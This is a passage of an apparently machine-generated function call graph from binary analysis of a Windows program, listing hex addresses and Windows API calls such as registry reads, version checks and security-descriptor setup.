37842 4f9913 37839->37842 37841 4f992e GetLastError 37840->37841 37840->37842 37841->37842 37842->37827 37844 4f8b3c 37843->37844 37847 4f8b42 37844->37847 37940 4fd3f7 6 API calls 37844->37940 37846 4f8b57 37846->37847 37848 4f9d9c 6 API calls 37846->37848 37849 4f9d9c 6 API calls 37847->37849 37850 4f8b64 37848->37850 37851 4f8b77 37849->37851 37852 4f9d9c 6 API calls 37850->37852 37853 4f9d9c 6 API calls 37851->37853 37852->37847 37854 4f8b89 37853->37854 37855 4f8b97 37854->37855 37928 4fb149 37854->37928 37857 4f9d9c 6 API calls 37855->37857 37858 4e318b 37857->37858 37858->37757 37884 4eee5d 37858->37884 37859->37707 37861 4fd0b5 11 API calls 37860->37861 37863 4fb1f4 37861->37863 37862 4fb206 RegQueryValueExW 37862->37863 37863->37862 37870 4fb258 37863->37870 37871 4fb233 GetProcessHeap HeapAlloc 37863->37871 37874 4fb251 37863->37874 37864 4f9d9c 6 API calls 37865 4fb297 37864->37865 37866 4fb2ab 37865->37866 37867 4fb29b GetProcessHeap HeapFree 37865->37867 37868 4fb2ba 37866->37868 37869 4fb2b1 RegCloseKey 37866->37869 37867->37866 37868->37714 37869->37868 37870->37874 37941 4e1c76 13 API calls 37870->37941 37871->37862 37872 4fb24a 37871->37872 37872->37874 37874->37864 37875->37740 37876->37755 37878 4e25a8 37877->37878 37879 4e25bc memcpy_s 37878->37879 37881 4e25e2 37878->37881 37880 4e25d7 37879->37880 37879->37881 37880->37881 37882 4e2619 sprintf_s 37880->37882 37881->37721 37882->37881 37883->37760 37885 4e31b8 37884->37885 37886 4eee67 GetProcessHeap HeapFree 37884->37886 37885->37768 37886->37885 37887->37724 37889 4fd189 GetCurrentProcess IsWow64Process 37888->37889 37890 4fd179 37888->37890 37891 4fd19e GetLastError 37889->37891 37892 4fd1b6 RegCreateKeyExW 37889->37892 37890->37889 37894 4fd1ab 37891->37894 37892->37894 37895 4f9d9c 6 API calls 37894->37895 37896 4fd207 37895->37896 37897 4fd20d RegCloseKey 37896->37897 37898 4fb2e9 37896->37898 37897->37898 37898->37772 37898->37774 37900 4fd0f9 RegOpenKeyExW 37899->37900 37901 4fd0e1 GetLastError 37899->37901 37903 4fd0ee 37900->37903 37901->37903 37904 4f9d9c 6 API calls 37903->37904 37905 4fd137 37904->37905 37906 4fd13c RegCloseKey 37905->37906 37907 4fb0da 37905->37907 37906->37907 37907->37783 37907->37784 37910 4e2669 37908->37910 37909 54ea60 4 API calls 37911 4e2190 37909->37911 37910->37910 37912 4e26ee strchr 37910->37912 37913 4e2723 strncpy_s _set_errno strtol 37910->37913 37914 4e275f _errno 37910->37914 37915 4e267b 37910->37915 37911->37795 37911->37797 37911->37798 37912->37910 37913->37910 37913->37914 37914->37910 37914->37915 37915->37909 37916->37814 37917->37812 37918->37807 37919->37812 37920->37819 37921->37823 37922->37817 37923->37823 37924->37829 37925->37834 37926->37836 37927->37838 37929 4fd0b5 11 API calls 37928->37929 37930 4fb170 37929->37930 37931 4f9d9c 6 API calls 37930->37931 37933 4fb1a1 37930->37933 37932 4fb17d RegSetValueExW 37931->37932 37932->37933 37934 4f9d9c 6 API calls 37933->37934 37935 4fb1b6 37934->37935 37936 4eee5d 2 API calls 37935->37936 37937 4fb1be 37936->37937 37938 4fb1cc 37937->37938 37939 4fb1c3 RegCloseKey 37937->37939 37938->37855 37939->37938 37940->37846 37941->37874 37689 4e35c0 37690 4e35dc 37689->37690 37692 4e34a0 186 API calls 37690->37692 37691 4e35e0 37692->37691 39839 5461c0 39840 546223 39839->39840 39841 5461d4 39839->39841 39841->39840 39842 5461f5 GetProcessHeap HeapFree 39841->39842 39843 546206 GetProcessHeap HeapAlloc 39841->39843 39842->39843 39843->39840 39844 546234 39843->39844 39844->39840 39850 54533c 39844->39850 39849 546287 GetFileSizeEx 39849->39840 39851 545367 39850->39851 39867 542880 39851->39867 39853 545383 GetLastError 39854 545370 39853->39854 39857 542880 39 API calls 39854->39857 39855 5453d7 39855->39840 39858 54540d 39855->39858 39857->39855 39859 54542d 39858->39859 39918 542310 SetFilePointer 39859->39918 39861 54546c 39861->39840 39861->39849 39862 545433 GetLastError 39862->39861 39863 54543e 39862->39863 39864 545464 SetLastError 39863->39864 39865 545459 GetLastError 39863->39865 39864->39861 39865->39861 39865->39864 39868 5428b4 CreateFileW 39867->39868 39869 542893 39867->39869 39902 542266 39868->39902 39874 541f8c 39869->39874 39906 54fedc 39874->39906 39876 541f98 InitializeSecurityDescriptor 39877 5421c7 39876->39877 39878 541fd8 AllocateAndInitializeSid 39876->39878 39907 542208 39877->39907 39878->39877 39879 541ffd AllocateAndInitializeSid 39878->39879 39879->39877 39881 54201e AllocateAndInitializeSid 39879->39881 39881->39877 39883 54203f GetCurrentThread OpenThreadToken 39881->39883 39886 542084 39883->39886 39887 542058 GetLastError 39883->39887 39884 5421ee 39884->39868 39885 5421dd GetProcessHeap HeapFree 39885->39884 39886->39877 39889 54208f GetTokenInformation 39886->39889 39887->39877 39888 542069 GetCurrentProcess OpenProcessToken 39887->39888 39888->39877 39888->39886 39889->39877 39890 5420a6 GetLastError 39889->39890 39890->39877 39891 5420b5 GetProcessHeap HeapAlloc 39890->39891 39891->39877 39892 5420d4 GetTokenInformation 39891->39892 39892->39877 39893 5420ef 6 API calls 39892->39893 39893->39877 39894 54213d InitializeAcl 39893->39894 39894->39877 39895 54214d AddAccessAllowedAce 39894->39895 39895->39877 39896 542162 AddAccessAllowedAce 39895->39896 39896->39877 39897 542177 AddAccessAllowedAce 39896->39897 39897->39877 39898 54218c EqualSid 39897->39898 39899 5421af SetSecurityDescriptorDacl 39898->39899 39900 54219b AddAccessAllowedAce 39898->39900 39899->39877 39901 5421c0 39899->39901 39900->39877 39900->39899 39901->39877 39903 542284 39902->39903 39904 54226a GetProcessHeap HeapFree 39902->39904 39903->39853 39903->39854 39904->39903 39905 54227e DebugBreak 39904->39905 39905->39903 39906->39876 39908 54220e FreeSid 39907->39908 39909 54221a 39907->39909 39908->39909 39910 542220 FreeSid 39909->39910 39911 54222c 39909->39911 39910->39911 39912 542232 FreeSid 39911->39912 39913 54223e 39911->39913 39912->39913 39914 542245 CloseHandle 39913->39914 39915 54224f 39913->39915 39914->39915 39916 5421d3 39915->39916 39917 542253 GetProcessHeap HeapFree 39915->39917 39916->39884 39916->39885 39917->39916 39919 542340 GetLastError 39918->39919 39920 54234e 39918->39920 39919->39920 39920->39861 39920->39862 37942 4e8be0 37943 4e8bf7 37942->37943 37944 4f8a19 186 API calls 37943->37944 37946 4e8c1d 37943->37946 37944->37946 37945 4e8c26 37947 4f8ab5 186 API calls 37945->37947 37946->37945 37950 4e8d3b 37946->37950 38006 4e8c4f 37947->38006 37948 4f9d9c 6 API calls 37949 4e914a 37948->37949 37951 4e8d6a 37950->37951 37952 4f8a19 186 API calls 37950->37952 37953 4f8a19 186 API calls 37951->37953 37954 4e8da3 37951->37954 37952->37951 37953->37954 37955 4f8a19 186 API calls 37954->37955 37956 4e8ddc 37954->37956 37955->37956 37957 4f8a19 186 API calls 37956->37957 37958 4e8e21 37956->37958 37957->37958 37959 4f8a19 186 API calls 37958->37959 37961 4e8e66 37958->37961 37959->37961 37960 4e8eab 37963 4f8a19 186 API calls 37960->37963 37964 4e8ee4 37960->37964 37961->37960 37962 4f8a19 186 API calls 37961->37962 37962->37960 37963->37964 37965 4f8a19 186 API calls 37964->37965 37966 4e8f1d 37964->37966 37965->37966 37967 4e8f54 37966->37967 37969 4f8a19 186 API calls 37966->37969 37968 4e8f8d 37967->37968 37976 4f8a19 186 API calls 37967->37976 38007 4ec756 37968->38007 37969->37967 37976->37968 38006->37948 38008 4ec765 __EH_prolog3_GS 38007->38008 38009 4ec78a memset 38008->38009 38122 4fe9f7 memset GetModuleFileNameW 38009->38122 38014 4ec83f 38134 4ff51a 38014->38134 38015 4ec7fd GetLastError 38019 4ec80a 38015->38019 38018 4f8af9 2 API calls 38029 4ec850 38018->38029 38020 4f8ab5 186 API calls 38019->38020 38062 4ec83a 38020->38062 38021 4ec8ad 38161 53de32 38021->38161 38023 4f9d9c 6 API calls 38025 4ecb24 38023->38025 38027 4ecb33 38025->38027 38258 4f9b21 8 API calls 38025->38258 38026 4ec8d4 38234 53d721 38026->38234 38032 4eee5d 2 API calls 38027->38032 38029->38019 38029->38021 38033 4f8a19 186 API calls 38029->38033 38034 4ecb49 38032->38034 38033->38021 38035 4eee5d 2 API calls 38034->38035 38036 4ecb58 38035->38036 38255 54f3a4 38036->38255 38039 4ec92f 38040 4f8a19 186 API calls 38039->38040 38046 4ec92a 38039->38046 38040->38046 38041 4ec8ea 38043 4f8a19 186 API calls 38041->38043 38041->38046 38042 4ec9cb 38044 4eca0b 38042->38044 38045 4ec9e3 GetSystemDefaultUILanguage 38042->38045 38043->38046 38050 4eca23 GetUserDefaultUILanguage 38044->38050 38052 4eca4b 38044->38052 38048 4eca01 38045->38048 38046->38042 38047 4f8a19 186 API calls 38046->38047 38047->38042 38049 4f8a19 186 API calls 38048->38049 38049->38044 38051 4eca41 38050->38051 38053 4f8a19 186 API calls 38051->38053 38054 4f8a19 186 API calls 38052->38054 38056 4eca88 38052->38056 38053->38052 38054->38056 38055 4ecad0 38240 4fb583 38055->38240 38056->38055 38060 4f8a19 186 API calls 38056->38060 38059 4ecaf4 38063 4f8ab5 186 API calls 38059->38063 38060->38055 38061 4ecb60 38061->38062 38064 4f8a19 186 API calls 38061->38064 38062->38023 38063->38062 38064->38062 38123 4fea52 GetLastError 38122->38123 38124 4fea41 38122->38124 38126 4fea5e 38123->38126 38127 4fea61 SetLastError 38123->38127 38259 4fea79 7 API calls 38124->38259 38126->38127 38129 54ea60 4 API calls 38127->38129 38128 4fea4c 38128->38123 38128->38127 38130 4ec7e7 38129->38130 38131 4f8af9 38130->38131 38132 4ec7f3 38131->38132 38133 4f8b06 GetProcessHeap HeapFree 38131->38133 38132->38014 38132->38015 38133->38132 38135 4ff665 SetLastError 38134->38135 38136 4ff540 38134->38136 38138 4ff66f 38135->38138 38136->38135 38137 4ff54b 38136->38137 38260 4fe347 38137->38260 38140 54ea60 4 API calls 38138->38140 38142 4ec844 38140->38142 38141 4ff550 38143 4ff558 38141->38143 38144 4ff652 GetLastError 38141->38144 38142->38018 38272 4ff496 GetFileVersionInfoSizeExW 38143->38272 38146 4ff65a SetLastError 38144->38146 38146->38138 38148 4ff573 VerQueryValueW 38151 4ff628 38148->38151 38152 4ff5a7 38148->38152 38149 4ff641 GetLastError 38149->38146 38150 4ff64d 38149->38150 38150->38146 38151->38146 38153 4ff62f GetProcessHeap HeapFree 38151->38153 38152->38151 38154 4fe595 _vsnwprintf 38152->38154 38153->38146 38155 4ff5da 38154->38155 38155->38151 38156 4ff5e1 VerQueryValueW 38155->38156 38156->38151 38157 4ff60d 38156->38157 38157->38151 38158 4ff61f 38157->38158 38279 4ff6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 38158->38279 38160 4ff624 38160->38151 38320 54f3e6 38161->38320 38163 53de41 memset memset 38321 53e4a7 memset RtlGetVersion 38163->38321 38166 4f9ca1 3 API calls 38167 53df10 38166->38167 38168 53df14 38167->38168 38339 53dc8e GetModuleHandleW GetProcAddress 38167->38339 38173 4f9d9c 6 API calls 38168->38173 38177 53e439 38173->38177 38174 53e208 38404 53ddca 6 API calls 38174->38404 38175 53df4e RegOpenKeyExW 38178 53df7a 38175->38178 38179 4eee5d 2 API calls 38177->38179 38178->38168 38180 53df7e RegQueryValueExW 38178->38180 38182 53e444 38179->38182 38183 53dfd3 RegQueryValueExW 38180->38183 38184 53dfb3 38180->38184 38181 53e23e RegOpenKeyExW 38185 53e26e RegCloseKey 38181->38185 38199 53e27a 38181->38199 38186 4eee5d 2 API calls 38182->38186 38187 53e015 RegQueryValueExW 38183->38187 38203 53e053 38183->38203 38184->38183 38185->38199 38189 53e44f 38186->38189 38187->38203 38188 53e20d 38188->38181 38190 4eee5d 2 API calls 38189->38190 38192 53e45a 38190->38192 38191 53e0b1 RegCloseKey 38198 53e0c3 38191->38198 38193 4eee5d 2 API calls 38192->38193 38197 53e465 38193->38197 38194 53e15b LoadLibraryW 38195 53e1b0 GetLastError 38194->38195 38196 53e16c GetProcAddress 38194->38196 38204 4e1d02 23 API calls 38195->38204 38196->38195 38223 53e17e 38196->38223 38200 4eee5d 2 API calls 38197->38200 38198->38194 38201 53e0f7 SetLastError GetLastError 38198->38201 38225 53e0d0 38198->38225 38348 54df14 38199->38348 38205 53e470 38200->38205 38206 4e1d02 23 API calls 38201->38206 38203->38191 38203->38198 38208 53e1e5 38204->38208 38209 53e478 FreeLibrary 38205->38209 38210 53e47f 38205->38210 38211 53e133 38206->38211 38207 53e322 38212 53e37e GetLastError 38207->38212 38213 53e32c CompareStringW 38207->38213 38214 54086c 140 API calls 38208->38214 38209->38210 38216 53e49b 38210->38216 38217 53e48f RegCloseKey 38210->38217 38218 54086c 140 API calls 38211->38218 38215 4e1d02 23 API calls 38212->38215 38219 53e356 38213->38219 38220 53e35b CompareStringW 38213->38220 38221 53e1f4 GetLastError 38214->38221 38222 53e3b4 38215->38222 38224 54f3a4 4 API calls 38216->38224 38217->38216 38218->38225 38226 53e3c3 GetLastError 38219->38226 38220->38219 38220->38226 38221->38168 38227 54086c 140 API calls 38222->38227 38223->38195 38229 53e193 38223->38229 38230 4ec8bb 38224->38230 38225->38168 38225->38194 38228 4e1d02 23 API calls 38226->38228 38227->38226 38231 53e41d 38228->38231 38233 53e1a4 GlobalFree 38229->38233 38230->38019 38230->38026 38232 54086c 140 API calls 38231->38232 38232->38168 38233->38181 38235 53d744 38234->38235 38237 53d736 38234->38237 38588 53d77d 38235->38588 38238 4f9d9c 6 API calls 38237->38238 38239 4ec8df 38238->38239 38239->38039 38239->38041 38612 4fc6d3 RegOpenKeyExW 38240->38612 38242 4fb5b4 RegQueryValueExW 38243 4fb5a2 38242->38243 38243->38242 38246 4fb608 38243->38246 38249 4fb5e3 GetProcessHeap HeapAlloc 38243->38249 38254 4fb601 38243->38254 38244 4f9d9c 6 API calls 38245 4fb647 38244->38245 38247 4fb65b 38245->38247 38248 4fb64b GetProcessHeap HeapFree 38245->38248 38246->38254 38618 4e1c76 13 API calls 38246->38618 38250 4ecae1 38247->38250 38251 4fb661 RegCloseKey 38247->38251 38248->38247 38249->38242 38252 4fb5fa 38249->38252 38250->38059 38250->38061 38251->38250 38252->38254 38254->38244 38256 54ea60 4 API calls 38255->38256 38257 54f3ae 38256->38257 38257->38257 38258->38027 38259->38128 38261 4fe3b2 SetLastError 38260->38261 38262 4fe350 38260->38262 38261->38141 38262->38261 38263 4fe357 38262->38263 38280 4fe5fc 38263->38280 38266 4fe39d GetLastError 38268 4fe3a5 SetLastError 38266->38268 38267 4fe366 GetFileAttributesW 38269 4fe374 38267->38269 38270 4fe383 GetLastError 38267->38270 38268->38141 38271 4fe38b GetProcessHeap HeapFree 38269->38271 38270->38271 38271->38268 38273 4ff4bd GetProcessHeap HeapAlloc 38272->38273 38277 4ff513 38272->38277 38274 4ff4f7 SetLastError 38273->38274 38275 4ff4d4 GetFileVersionInfoExW 38273->38275 38276 4ff4ea 38274->38276 38275->38276 38276->38277 38278 4ff503 GetProcessHeap HeapFree 38276->38278 38277->38148 38277->38149 38278->38277 38279->38160 38281 4fe63f 38280->38281 38282 4fe802 SetLastError 38280->38282 38281->38282 38284 4fe64a 38281->38284 38283 4fe80c 38282->38283 38285 54ea60 4 API calls 38283->38285 38315 4fea79 7 API calls 38284->38315 38287 4fe360 38285->38287 38287->38266 38287->38267 38289 4fe657 38290 4fe660 GetLastError 38289->38290 38292 4fe682 38289->38292 38291 4fe66a 38290->38291 38291->38292 38293 4fe676 GetLastError 38291->38293 38294 4fe6bc _wcsnicmp 38292->38294 38309 4fe7b7 38292->38309 38314 4fe716 38292->38314 38293->38292 38295 4fe6d4 _wcsnicmp 38294->38295 38294->38314 38298 4fe6e8 38295->38298 38295->38314 38297 4fe763 38299 4fe769 GetLastError 38297->38299 38307 4fe78b 38297->38307 38316 4fee2e 7 API calls 38298->38316 38303 4fe773 38299->38303 38300 4fe7f4 SetLastError 38300->38283 38301 4fe7e4 GetProcessHeap HeapFree 38301->38300 38306 4fe77f GetLastError 38303->38306 38303->38307 38304 4fe7a3 _wcsnicmp 38308 4fe7bc _wcsnicmp 38304->38308 38304->38309 38305 4fe6f7 38305->38309 38310 4fe72e 38305->38310 38311 4fe70b 38305->38311 38306->38307 38307->38304 38307->38309 38308->38309 38309->38300 38309->38301 38318 4fe9ac 6 API calls 38310->38318 38317 4fe9ac 6 API calls 38311->38317 38314->38309 38319 4ff6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 38314->38319 38315->38289 38316->38305 38317->38314 38318->38314 38319->38297 38320->38163 38322 4f9ca1 3 API calls 38321->38322 38323 53e4ff 38322->38323 38324 53dcf8 6 API calls 38323->38324 38327 53e503 38323->38327 38325 53e520 38324->38325 38326 53e52d GetLastError 38325->38326 38405 53daaa RegOpenKeyExW 38325->38405 38332 4e1d02 23 API calls 38326->38332 38328 4f9d9c 6 API calls 38327->38328 38331 53e5f3 38328->38331 38333 54ea60 4 API calls 38331->38333 38334 53e59f 38332->38334 38335 53deb0 memset memset memset RtlGetVersion 38333->38335 38336 54086c 140 API calls 38334->38336 38335->38166 38337 53e5ae 38336->38337 38338 53dcf8 6 API calls 38337->38338 38338->38327 38340 53dcc4 GetSystemInfo 38339->38340 38341 53dcb8 GetNativeSystemInfo 38339->38341 38343 53dcca 38340->38343 38341->38343 38344 53dcf8 memset RtlGetVersion 38343->38344 38345 53dd3e 38344->38345 38346 54ea60 4 API calls 38345->38346 38347 53dd56 38346->38347 38347->38174 38347->38175 38349 54df20 __EH_prolog3 38348->38349 38428 54dd36 38349->38428 38351 54df7c 38352 54df94 38351->38352 38353 54dfb8 38351->38353 38378 54df82 38351->38378 38460 4ff6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 38352->38460 38354 54dfa5 38353->38354 38355 54dfd9 38353->38355 38354->38353 38354->38378 38461 4ff6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 38354->38461 38358 54dfcf 38355->38358 38359 54dffa 38355->38359 38358->38355 38358->38378 38462 4ff6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 38358->38462 38363 54dff0 38359->38363 38364 54e01b 38359->38364 38360 54df9c 38365 4f8af9 2 API calls 38360->38365 38361 54dfc6 38368 4f8af9 2 API calls 38361->38368 38363->38359 38363->38378 38463 4ff6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 38363->38463 38367 54e011 38364->38367 38364->38378 38365->38354 38367->38364 38367->38378 38464 4ff6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 38367->38464 38368->38358 38369 4f9d9c 6 API calls 38373 54e098 38369->38373 38370 54dfe7 38374 4f8af9 2 API calls 38370->38374 38371 54e008 38375 4f8af9 2 API calls 38371->38375 38377 4eee5d 2 API calls 38373->38377 38374->38363 38375->38367 38376 54e02a 38379 4f8af9 2 API calls 38376->38379 38380 54e0a0 38377->38380 38378->38369 38381 54e033 38379->38381 38382 4eee5d 2 API calls 38380->38382 38381->38378 38383 54e0a8 38382->38383 38384 4eee5d 2 API calls 38383->38384 38385 54e0b0 38384->38385 38386 4eee5d 2 API calls 38385->38386 38387 54e0b8 38386->38387 38388 4eee5d 2 API calls 38387->38388 38389 54e0c0 38388->38389 38390 54e0d2 38389->38390 38465 4f9b21 8 API calls 38389->38465 38392 54e0e7 38390->38392 38466 4f9b21 8 API calls 38390->38466 38394 54e0fc 38392->38394 38467 4f9b21 8 API calls 38392->38467 38396 54e10f 38394->38396 38468 4f9b21 8 API calls 38394->38468 38398 54e122 38396->38398 38469 4f9b21 8 API calls 38396->38469 38399 54e137 38398->38399 38470 4f9b21 8 API calls 38398->38470 38402 54e14c 38399->38402 38471 4f9b21 8 API calls 38399->38471 38402->38207 38404->38188 38406 53db37 memset RegQueryValueExW RegCloseKey 38405->38406 38407 53dae9 GetLastError 38405->38407 38409 53db99 38406->38409 38410 53dc2f 38406->38410 38408 4e1d02 23 API calls 38407->38408 38411 53db1a 38408->38411 38414 53dbe3 SetLastError GetLastError 38409->38414 38415 53db9e GetLastError 38409->38415 38412 53dc38 GetLastError 38410->38412 38413 53dc6c _wtoi 38410->38413 38416 54086c 140 API calls 38411->38416 38417 4e1d02 23 API calls 38412->38417 38422 53db30 38413->38422 38419 4e1d02 23 API calls 38414->38419 38418 4e1d02 23 API calls 38415->38418 38421 53db29 SetLastError 38416->38421 38420 53dc1b 38417->38420 38423 53dbce 38418->38423 38419->38420 38426 54086c 140 API calls 38420->38426 38421->38422 38424 54ea60 4 API calls 38422->38424 38425 54086c 140 API calls 38423->38425 38427 53dc8c 38424->38427 38425->38422 38426->38422 38427->38326 38431 54dd42 __EH_prolog3 38428->38431 38429 4f9d9c 6 API calls 38430 54de82 38429->38430 38432 54de91 38430->38432 38545 4f9b21 8 API calls 38430->38545 38454 54dd6f 38431->38454 38472 54d5fc 38431->38472 38436 54dea3 38432->38436 38546 4f9b21 8 API calls 38432->38546 38438 54deb6 38436->38438 38547 4f9b21 8 API calls 38436->38547 38441 54decb 38438->38441 38548 4f9b21 8 API calls 38438->38548 38443 54dee0 38441->38443 38549 4f9b21 8 API calls 38441->38549 38446 54def3 38443->38446 38550 4f9b21 8 API calls 38443->38550 38444 54ddb7 38444->38454 38530 54d245 38444->38530 38448 54df06 38446->38448 38551 4f9b21 8 API calls 38446->38551 38448->38351 38453 54ddd6 38453->38454 38543 54dc16 23 API calls __EH_prolog3_GS 38453->38543 38454->38429 38456 54ddf6 38456->38454 38457 54de0b 38456->38457 38544 54daf6 23 API calls __EH_prolog3_GS 38457->38544 38459 54de13 38459->38454 38460->38360 38461->38361 38462->38370 38463->38371 38464->38376 38465->38390 38466->38392 38467->38394 38468->38396 38469->38398 38470->38399 38471->38402 38473 54d60b __EH_prolog3_GS 38472->38473 38474 54d645 memset RtlGetVersion 38473->38474 38483 54d63b 38473->38483 38475 4f9ca1 3 API calls 38474->38475 38476 54d67e 38475->38476 38479 4fb1d4 24 API calls 38476->38479 38476->38483 38486 54d6f1 38476->38486 38477 4f9d9c 6 API calls 38478 54d89d 38477->38478 38480 54d8b2 38478->38480 38579 4f9b21 8 API calls 38478->38579 38481 54d6b1 38479->38481 38485 54d8c4 38480->38485 38580 4f9b21 8 API calls 38480->38580 38481->38483 38484 54d6c9 CompareStringW 38481->38484 38483->38477 38484->38486 38488 54d77c CompareStringW 38484->38488 38489 54d8d6 38485->38489 38581 4f9b21 8 API calls 38485->38581 38486->38483 38495 4f9c14 11 API calls 38486->38495 38488->38486 38490 54d7a7 CompareStringW 38488->38490 38492 54d8ec 38489->38492 38582 4f9b21 8 API calls 38489->38582 38490->38486 38494 54d701 38490->38494 38493 54f3a4 4 API calls 38492->38493 38497 54d8f7 38493->38497 38494->38483 38552 54d460 38494->38552 38495->38494 38497->38454 38503 54d8f8 38497->38503 38500 54d720 CompareStringW 38500->38483 38501 54d746 38500->38501 38574 4e1bc9 38501->38574 38504 54d904 __EH_prolog3 38503->38504 38505 54d91a 38504->38505 38506 54d460 32 API calls 38504->38506 38513 4f9d9c 6 API calls 38505->38513 38507 54d933 38506->38507 38507->38505 38508 54d948 CompareStringW 38507->38508 38509 54daa5 CompareStringW 38508->38509 38510 54d96d 38508->38510 38511 54dac4 CompareStringW 38509->38511 38514 54da3b 38509->38514 38512 54d5fc 47 API calls 38510->38512 38511->38514 38515 54d975 38512->38515 38516 54da65 38513->38516 38522 4f9c14 11 API calls 38514->38522 38515->38505 38517 54d98a CompareStringW 38515->38517 38518 54da74 38516->38518 38584 4f9b21 8 API calls 38516->38584 38517->38514 38520 54d9af CompareStringW 38517->38520 38521 54da87 38518->38521 38585 4f9b21 8 API calls 38518->38585 38520->38514 38523 54d9ca CompareStringW 38520->38523 38525 54da99 38521->38525 38586 4f9b21 8 API calls 38521->38586 38522->38505 38523->38514 38526 54d9e5 CompareStringW 38523->38526 38525->38444 38526->38514 38528 54da00 CompareStringW 38526->38528 38528->38514 38529 54da1b CompareStringW 38528->38529 38529->38514 38531 54d251 __EH_prolog3_GS 38530->38531 38532 54d269 GetNativeSystemInfo 38531->38532 38536 54d25b 38531->38536 38534 54d286 38532->38534 38533 4f9c14 11 API calls 38533->38536 38534->38533 38534->38536 38535 4f9d9c 6 API calls 38537 54d2e0 38535->38537 38536->38535 38538 54d2f0 38537->38538 38587 4f9b21 8 API calls 38537->38587 38540 54f3a4 4 API calls 38538->38540 38541 54d2fb 38540->38541 38541->38454 38542 54d2fc 27 API calls __EH_prolog3_GS 38541->38542 38542->38453 38543->38456 38544->38459 38545->38432 38546->38436 38547->38438 38548->38441 38549->38443 38550->38446 38551->38448 38553 54d46f __EH_prolog3_GS 38552->38553 38554 54d494 memset RtlGetVersion 38553->38554 38563 54d483 38553->38563 38555 4f9ca1 3 API calls 38554->38555 38556 54d4cd 38555->38556 38557 54d5a8 38556->38557 38558 54d587 38556->38558 38562 54d4f9 38556->38562 38556->38563 38559 4fb1d4 24 API calls 38557->38559 38567 4f9c14 11 API calls 38558->38567 38559->38563 38560 4f9d9c 6 API calls 38561 54d5de 38560->38561 38564 54d5f0 38561->38564 38583 4f9b21 8 API calls 38561->38583 38562->38558 38568 54d50f GetModuleHandleW GetProcAddress 38562->38568 38563->38560 38566 54f3a4 4 API calls 38564->38566 38569 54d5fb 38566->38569 38567->38563 38570 54d540 38568->38570 38571 54d52c GetLastError 38568->38571 38569->38483 38569->38500 38570->38571 38573 54d568 38570->38573 38572 54d539 38571->38572 38572->38563 38573->38558 38575 4f95ca 22 API calls 38574->38575 38576 4e1bdf 38575->38576 38577 4f9d9c 6 API calls 38576->38577 38578 4e1bf3 38577->38578 38578->38483 38579->38480 38580->38485 38581->38489 38582->38492 38583->38564 38584->38518 38585->38521 38586->38525 38587->38538 38589 53d789 __EH_prolog3 38588->38589 38590 53d7c5 LoadLibraryExW 38589->38590 38611 53d7b4 38589->38611 38591 53d7db GetLastError 38590->38591 38592 53d7ec GetProcAddress 38590->38592 38591->38611 38593 53d812 GetProcAddress 38592->38593 38594 53d7fe GetLastError 38592->38594 38593->38594 38595 53d825 GetProcAddress 38593->38595 38594->38611 38595->38594 38596 53d838 GetProcAddress 38595->38596 38596->38594 38597 53d84b GetProcAddress 38596->38597 38597->38594 38609 53d85e 38597->38609 38598 4f9d9c 6 API calls 38599 53d9c2 38598->38599 38600 53d9d5 38599->38600 38601 53d9c8 LocalFree 38599->38601 38602 53d9db LocalFree 38600->38602 38603 53d9e8 38600->38603 38601->38600 38602->38603 38604 53d9fb 38603->38604 38605 53d9ee LocalFree 38603->38605 38606 53da03 FreeLibrary 38604->38606 38607 53da0a 38604->38607 38605->38604 38606->38607 38607->38237 38608 53d8bf LocalFree 38608->38609 38609->38608 38610 53d92e LocalFree 38609->38610 38609->38611 38610->38609 38611->38598 38613 4fc700 38612->38613 38614 4f9d9c 6 API calls 38613->38614 38615 4fc721 38614->38615 38616 4fc728 RegCloseKey 38615->38616 38617 4fc731 38615->38617 38616->38617 38617->38243 38618->38254 39794 4e93e0 39795 4e9427 39794->39795 39796 4e93f2 39794->39796 39798 4e9438 39795->39798 39814 4f8f1d GetFileAttributesW 39795->39814 39820 4f8eec 7 API calls 39796->39820 39799 4e9465 39798->39799 39810 4e943e 39798->39810 39821 4f9b21 8 API calls 39798->39821 39803 4e947c 39799->39803 39822 4f9273 20 API calls 39799->39822 39800 4e93fd 39800->39795 39804 4e9403 39800->39804 39806 4e9497 39803->39806 39803->39810 39823 4f9b21 8 API calls 39803->39823 39804->39810 39807 4e94d5 39806->39807 39824 4f9273 20 API calls 39806->39824 39811 4f9d9c 6 API calls 39807->39811 39810->39807 39813 4f8ab5 186 API calls 39810->39813 39812 4e94dc 39811->39812 39813->39807 39815 4f8f2e 39814->39815 39816 4f9d9c 6 API calls 39815->39816 39817 4f8f41 39816->39817 39818 4f9d9c 6 API calls 39817->39818 39819 4f8f48 39818->39819 39819->39798 39820->39800 39821->39799 39822->39803 39823->39806 39824->39810 40170 4e35f0 40171 4e3605 40170->40171 40172 4e3613 40170->40172 40175 4f9d9c 6 API calls 40171->40175 40180 4e3a5e 40172->40180 40174 4e362b 40200 4e3b56 40174->40200 40177 4e366c 40175->40177 40178 4e3646 40178->40171 40179 4f8a19 186 API calls 40178->40179 40179->40171 40181 4e3a6a __EH_prolog3 40180->40181 40198 4e3a80 40181->40198 40218 4f490f 19 API calls __aulldiv 40181->40218 40183 4e3aab 40184 4f8c1d 19 API calls 40183->40184 40183->40198 40186 4e3ac3 40184->40186 40185 4f9d9c 6 API calls 40187 4e3b35 40185->40187 40188 4e3aeb 40186->40188 40189 4e3ad0 40186->40189 40186->40198 40190 4e3b40 40187->40190 40222 4f9b21 8 API calls 40187->40222 40193 4e3b08 40188->40193 40194 4e3af0 40188->40194 40219 4e37ab 6 API calls 40189->40219 40195 4e3b4c 40190->40195 40223 4f9b21 8 API calls 40190->40223 40193->40198 40221 4e3983 7 API calls __EH_prolog3 40193->40221 40220 4e388d 6 API calls 40194->40220 40195->40174 40198->40185 40201 4e3b62 __EH_prolog3 40200->40201 40216 4e3b77 40201->40216 40224 4f4406 12 API calls __aulldiv 40201->40224 40203 4e3ba0 40204 4e1bc9 22 API calls 40203->40204 40203->40216 40205 4e3bbc 40204->40205 40208 4e3bcc 40205->40208 40209 4e3be7 40205->40209 40205->40216 40206 4f9d9c 6 API calls 40207 4e3c32 40206->40207 40210 4e3c3d 40207->40210 40228 4f9b21 8 API calls 40207->40228 40225 4e37ab 6 API calls 40208->40225 40211 4e3bec 40209->40211 40212 